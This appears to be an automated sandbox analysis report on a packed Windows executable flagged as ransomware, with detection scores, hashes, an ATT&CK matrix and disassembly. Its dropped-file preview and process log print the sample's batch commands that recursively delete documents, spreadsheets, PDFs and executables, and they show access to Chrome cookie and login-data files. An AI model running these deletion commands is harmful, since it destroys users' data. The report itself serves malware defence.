Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\MANIFEST-000001Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\000003.logJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action PredictorJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\000003.logJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Current TabsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Media History-journalJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.logJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db-journalJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\33d102032f141cd7_0Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NELJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Media HistoryJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journalJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Last SessionJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENTJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BookmarksJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent StateJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOCKJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies-journalJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOCKJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000003.logJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\1e3343c9662f5434_0Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\FaviconsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\ShortcutsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-indexJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Trust Tokens-journalJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor-journalJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fee6704ec67d5ed1_0Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\History-journalJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOGJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCKJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider CacheJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2Jump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsNative API1Path InterceptionProcess Injection12Virtualization/Sandbox Evasion11OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection12LSASS MemorySecurity Software Discovery12Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerVirtualization/Sandbox Evasion11SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing11NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Z0hOr2pD7k.exe56%VirustotalBrowse
Z0hOr2pD7k.exe20%MetadefenderBrowse
Z0hOr2pD7k.exe39%ReversingLabsWin32.Ransomware.Encoder
Z0hOr2pD7k.exe100%AviraTR/Dropper.Gen
Z0hOr2pD7k.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.0.Z0hOr2pD7k.exe.9c0000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
0.2.Z0hOr2pD7k.exe.9c0000.0.unpack100%AviraHEUR/AGEN.1110391Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://www.xvideos.comZ0hOr2pD7k.exe, 00000000.00000002.917145240.00000000010FD000.00000004.00000001.sdmpfalse
    high
    https://www.xvideos.com/video64080443/_Z0hOr2pD7k.exe, 00000000.00000002.917145240.00000000010FD000.00000004.00000001.sdmpfalse
      high

      Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:452577
      Start date:22.07.2021
      Start time:15:57:09
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 8m 57s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Z0hOr2pD7k (renamed file extension from none to exe)
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:75
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal76.spyw.evad.winEXE@128/22@0/0
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:Failed
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): SearchUI.exe, BackgroundTransferHost.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, svchost.exe
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtOpenFile calls found.
      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      15:58:00API Interceptor1x Sleep call for process: Z0hOr2pD7k.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      \Device\ConDrv
      Process:C:\Users\user\Desktop\Z0hOr2pD7k.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):945
      Entropy (8bit):4.3861642457709715
      Encrypted:false
      SSDEEP:12:k00fG8GxH0V0GhGG0Y10Wk0WdkG04KGM08Gq0GIKGrGu0g020JOH0M0Y:KaUqXWJWa4Pr0dP3RY
      MD5:1ADBBD570354E68D34F2F31F3459DF05
      SHA1:3B20056EEB1010C6FA3943F608435627F22C2302
      SHA-256:13E4A5FB6A53469020B4B09092DFCD7A4CD5CA3796ACA23020C5105ADABFD584
      SHA-512:BA8283C3124847227AD9BC81D3E42728441057EA4BECBF5B6338194A415D0AE6BA2B0ECC2BEE6FBDDC0E9D22A590B3BC5834E1B357DFAF9EDA0D8B87ABD71649
      Malicious:false
      Preview: del /S /Q *.doc c:\users\%username%\ > nul..del /S /Q *.docm c:\users\%username%\ > nul..del /S /Q *.docx c:\users\%username%\ > nul..del /S /Q *.dot c:\users\%username%\ > nul..del /S /Q *.dotm c:\users\%username%\ > nul..del /S /Q *.dotx c:\users\%username%\ > nul..del /S /Q *.pdf c:\users\%username%\ > nul..del /S /Q *.csv c:\users\%username%\ > nul..del /S /Q *.xls c:\users\%username%\ > nul..del /S /Q *.xlsx c:\users\%username%\ > nul..del /S /Q *.xlsm c:\users\%username%\ > nul..del /S /Q *.ppt c:\users\%username%\ > nul..del /S /Q *.pptx c:\users\%username%\ > nul..del /S /Q *.pptm c:\users\%username%\ > nul..del /S /Q *.jtdc c:\users\%username%\ > nul..del /S /Q *.jttc c:\users\%username%\ > nul..del /S /Q *.jtd c:\users\%username%\ > nul..del /S /Q *.jtt c:\users\%username%\ > nul..del /S /Q *.txt c:\users\%username%\ > nul..del /S /Q *.exe c:\users\%username%\ > nul..del /S /Q *.log c:\users\%username%\ > nul..
      \Device\Null
      Process:C:\Windows\SysWOW64\cmd.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):2324
      Entropy (8bit):4.938033230487595
      Encrypted:false
      SSDEEP:48:ICD6DO2xDi2xD48xDSxDPxDT8xDLbDiDFDybcxDybLDybRDysDKDpDhDXUbvXUbp:ICaO2ti2tntStPtwtLniBygty7yJJKlp
      MD5:4D49A90F8BC3A9D8E88BF0B9E1665ACD
      SHA1:75A87EA6D89C8EF074F329E1AAC0E1AC92F29DD4
      SHA-256:1A2F0410A26F323EC3CA4609FCB3CC953A611A77B0BCE54C12542F40549404E5
      SHA-512:A0A0A9BF7BC65B09316E22E5C72BBD0DDE415A3AEB0842376290DD543B9B0D21D59B1A7606A59A26D0DA4FD6BB3BB35C25B24AFDA18D54569F208D4C53CD0275
      Malicious:false
      Preview: c:\users\user\AppData\Local\Microsoft\GameDVR\KnownGameList.bin..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm595.tmp..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm596.tmp..c:\users\user\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm597.tmp..c:\users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db..c:\users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db-shm..c:\users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.d

      Static File Info

      General

      File type:PE32 executable (console) Intel 80386, for MS Windows, UPX compressed
      Entropy (8bit):3.7984307029224165
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.66%
      • UPX compressed Win32 Executable (30571/9) 0.30%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:Z0hOr2pD7k.exe
      File size:571904
      MD5:8edf0aa789d976df0c80fd8d62734ded
      SHA1:54a8b718fda1ea749df17271d3f897c947004483
      SHA256:fb80dab592c5b2a1dcaaf69981c6d4ee7dbf6c1f25247e2ab648d4d0dc115a97
      SHA512:577d6e311160a8435ad7b5318e17b51b1e0dbf12ef8e484995890ba48a2860b95ac525b0107bebd312615c05f56320ca8d11946135c6093a01fb27141e548741
      SSDEEP:3072:ApJs5aBFWosyzhIXj4Ix0RBZbAi4BGijv4Li+gFUm0ZJgRlLPwKIhyWcMyHSZbqv:ApJoKzhIXj4Ix0rZbZW
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........oZ...4...4...4..v....4..{5...4..{1...4..{0...4..{7...4..e5...4...5...4..{=...4..{....4.......4..{6...4.Rich..4................

      File Icon

      Icon Hash:08e4e6c8c8dcf408

      Static PE Info

      General

      Entrypoint:0x4928c0
      Entrypoint Section:UPX1
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows cui
      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
      DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Time Stamp:0x60F66485 [Tue Jul 20 05:52:05 2021 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:6
      OS Version Minor:0
      File Version Major:6
      File Version Minor:0
      Subsystem Version Major:6
      Subsystem Version Minor:0
      Import Hash:b7373c4e4b3b995daa8d1068e812ff00

      Entrypoint Preview

      Instruction
      pushad
      mov esi, 00491000h
      lea edi, dword ptr [esi-00090000h]
      push edi
      or ebp, FFFFFFFFh
      jmp 00007F7754BDCAF2h
      nop
      nop
      nop
      nop
      nop
      nop
      mov al, byte ptr [esi]
      inc esi
      mov byte ptr [edi], al
      inc edi
      add ebx, ebx
      jne 00007F7754BDCAE9h
      mov ebx, dword ptr [esi]
      sub esi, FFFFFFFCh
      adc ebx, ebx
      jc 00007F7754BDCACFh
      mov eax, 00000001h
      add ebx, ebx
      jne 00007F7754BDCAE9h
      mov ebx, dword ptr [esi]
      sub esi, FFFFFFFCh
      adc ebx, ebx
      adc eax, eax
      add ebx, ebx
      jnc 00007F7754BDCAEDh
      jne 00007F7754BDCB0Ah
      mov ebx, dword ptr [esi]
      sub esi, FFFFFFFCh
      adc ebx, ebx
      jc 00007F7754BDCB01h
      dec eax
      add ebx, ebx
      jne 00007F7754BDCAE9h
      mov ebx, dword ptr [esi]
      sub esi, FFFFFFFCh
      adc ebx, ebx
      adc eax, eax
      jmp 00007F7754BDCAB6h
      add ebx, ebx
      jne 00007F7754BDCAE9h
      mov ebx, dword ptr [esi]
      sub esi, FFFFFFFCh
      adc ebx, ebx
      adc ecx, ecx
      jmp 00007F7754BDCB34h
      xor ecx, ecx
      sub eax, 03h
      jc 00007F7754BDCAF3h
      shl eax, 08h
      mov al, byte ptr [esi]
      inc esi
      xor eax, FFFFFFFFh
      je 00007F7754BDCB57h
      sar eax, 1
      mov ebp, eax
      jmp 00007F7754BDCAEDh
      add ebx, ebx
      jne 00007F7754BDCAE9h
      mov ebx, dword ptr [esi]
      sub esi, FFFFFFFCh
      adc ebx, ebx
      jc 00007F7754BDCAAEh
      inc ecx
      add ebx, ebx
      jne 00007F7754BDCAE9h
      mov ebx, dword ptr [esi]
      sub esi, FFFFFFFCh
      adc ebx, ebx
      jc 00007F7754BDCAA0h
      add ebx, ebx
      jne 00007F7754BDCAE9h
      mov ebx, dword ptr [esi]
      sub esi, FFFFFFFCh
      adc ebx, ebx
      adc ecx, ecx
      add ebx, ebx
      jnc 00007F7754BDCAD1h
      jne 00007F7754BDCAEBh
      mov ebx, dword ptr [esi]
      sub esi, FFFFFFFCh
      adc ebx, ebx
      jnc 00007F7754BDCAC6h
      add ecx, 02h
      cmp ebp, FFFFFB00h
      adc ecx, 02h
      lea edx, dword ptr [eax+eax]

      Rich Headers

      Programming Language:
      • [IMP] VS2008 SP1 build 30729

      Data Directories

      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x11c5780x2b0.rsrc
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x930000x89578.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x11c8280x14.rsrc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x92aa40xbcUPX1
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

      Sections

      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
      UPX00x10000x900000x0False0empty0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
      UPX10x910000x20000x1c00False0.923549107143data7.66105631361IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
      .rsrc0x930000x8a0000x89a00False0.0821110779973data3.71346043147IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

      Resources

      NameRVASizeTypeLanguageCountry
      RT_ICON0x9323c0x42028dataJapaneseJapan
      RT_ICON0xd52680x25228dataJapaneseJapan
      RT_ICON0xfa4940x10828dataJapaneseJapan
      RT_ICON0x10acc00x94a8dataJapaneseJapan
      RT_ICON0x11416c0x4228dataJapaneseJapan
      RT_ICON0x1183980x25a8dataJapaneseJapan
      RT_ICON0x11a9440x10a8dataJapaneseJapan
      RT_ICON0x11b9f00x988dataJapaneseJapan
      RT_GROUP_ICON0x11c37c0x76dataJapaneseJapan
      RT_MANIFEST0x11c3f80x17dXML 1.0 document textEnglishUnited States

      Imports

      DLLImport
      api-ms-win-crt-heap-l1-1-0.dll_set_new_mode
      api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
      api-ms-win-crt-math-l1-1-0.dll__setusermatherr
      api-ms-win-crt-runtime-l1-1-0.dllexit
      api-ms-win-crt-stdio-l1-1-0.dll_set_fmode
      api-ms-win-crt-string-l1-1-0.dll_stricmp
      KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
      USER32.dllEnumWindows
      VCRUNTIME140.dllmemset

      Possible Origin

      Language of compilation systemCountry where language is spokenMap
      JapaneseJapan
      EnglishUnited States

      Network Behavior

      No network behavior found

      Code Manipulations

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      Behavior

      Click to jump to process

      System Behavior

      General

      Start time:15:57:59
      Start date:22/07/2021
      Path:C:\Users\user\Desktop\Z0hOr2pD7k.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\Z0hOr2pD7k.exe'
      Imagebase:0x9c0000
      File size:571904 bytes
      MD5 hash:8EDF0AA789D976DF0C80FD8D62734DED
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low

      General

      Start time:15:57:59
      Start date:22/07/2021
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff724c50000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:15:58:00
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c echo Microsoft Windows 10 self error check has been ready...
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:15:58:01
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft Corporation
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:15:58:01
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2021 Adobe Corporation
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:15:58:06
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESS
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:15:58:07
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c echo Wait a minute...
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:15:58:07
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c @echo OFF
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:15:58:08
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:15:58:12
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:15:58:17
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:58:21
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:58:25
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:58:29
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:58:36
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:58:39
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nul
      Imagebase:0x11d0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:15:58:44
      Start date:22/07/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nul
      Imagebase:0x11d0000
